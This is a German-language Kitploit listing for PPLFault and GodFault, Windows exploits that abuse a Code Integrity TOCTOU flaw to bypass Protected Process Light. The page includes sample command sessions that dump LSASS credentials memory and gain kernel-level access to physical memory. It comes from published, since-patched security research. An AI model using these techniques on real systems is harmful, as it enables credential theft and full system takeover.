Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PPLFault — Windows-Exploit zur Privilegieneskalation, der eine TOCTOU-Schwachstelle in Code Integrity ausnutzt, um Protected Process Light zu umgehen, als WinTcb-Light ausgeführt zu werden und geschützte Prozesse (z. B. LSASS) zu dumpen. | Kitploit
Tools/GitHubGitHub/gabriellandau/pplfault
Privilege EscalationExploitationPost-ExploitationPenetrationstestsRed TeamingArchived
GitHubgabriellandau/pplfault

PPLFault

Windows-Exploit zur Privilegieneskalation, der eine TOCTOU-Schwachstelle in Code Integrity ausnutzt, um Protected Process Light zu umgehen, als WinTcb-Light ausgeführt zu werden und geschützte Prozesse (z. B. LSASS) zu dumpen.

Repository anzeigen
567815vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PPLFault

Von Gabriel Landau bei Elastic Security.

Aus PPLdump ist tot. Es lebe PPLdump! vorgestellt auf Black Hat Asia 2023.

PPLdump ist tot. Es lebe PPLdump!

PPLFault

2024-02-AKTUALISIERUNG: Microsoft hat PPLFault am 2024-02-13 gepatcht. Siehe diesen Thread für die zugehörige Diskussion.

Nutzt eine TOCTOU in der Windows-Codeintegrität aus, um beliebige Codeausführung als WinTcb-Light zu erreichen und anschließend einen bestimmten Prozess auszudumpen. Weitere Einzelheiten zum Exploit finden Sie in meinen Folien und/oder Vortrag.

Beispielausgabe

root@kitploit:~
PS C:\Users\user\Desktop> cmd /c ver

Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe                      992 Services                   0     76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection

Type           Signer
----           ------
ProtectedLight Lsa


PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
 [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Dump saved to: lsass.dmp
 [+] Dump is 74.9 MB
 [+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp


    Directory: C:\Users\user\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/1/2023  11:18 AM       78581973 lsass.dmp

GodFault

Nutzt dieselbe TOCTOU wie PPLFault aus. Anstatt jedoch einen Prozess auszudumpen, migriert es zu CSRSS und nutzt eine Schwachstelle in win32k!NtUserHardErrorControlCall aus, die aus ANGRYORCHARD stammt, um KTHREAD.PreviousMode von UserMode (1) auf KernelMode (0) zu dekrementieren. Es beweist „God Mode“-Zugriff, indem es \Device\PhysicalMemory, das normalerweise vom UserMode aus nicht zugänglich ist, als SECTION_ALL_ACCESS öffnet.

Beispielausgabe

root@kitploit:~
C:\Users\user\Desktop>GodFault.exe -v
 [?] Server does not appear to be running.  Attempting to install it...
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
 [+] CSRSS PID is 772
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
 [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b4
 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1c0
 [+] Press any key to continue...
 [+] No cleanup necessary.  Backup does not exist.

Python

PoC, der beliebige Codeausführung als WinTcb-Light ohne die CloudFilter-API erreicht. Siehe python/README.md.

Getestete Plattformen

Windows 11 22H2 22621.1702 (Mai 2023)Windows 11 Insider Canary 25346.1001 (April 2023)
PPLFault✔️✔️
GodFault✔️❌ Insider-PreviousMode-Mitigation Bugchecks

Lizenz

PPLFault unterliegt der ELv2-Lizenz. Es verwendet phnt von SystemInformer unter der MIT-Lizenz.

Danksagungen

Inspiriert von PPLdump von Clément Labro, das Microsoft im Juli 2022 gepatcht hat.

ANGRYORCHARD wurde von Austin Hudson erstellt, der es veröffentlichte, als Microsoft PPLdump gepatcht hat.

Tool herunterladen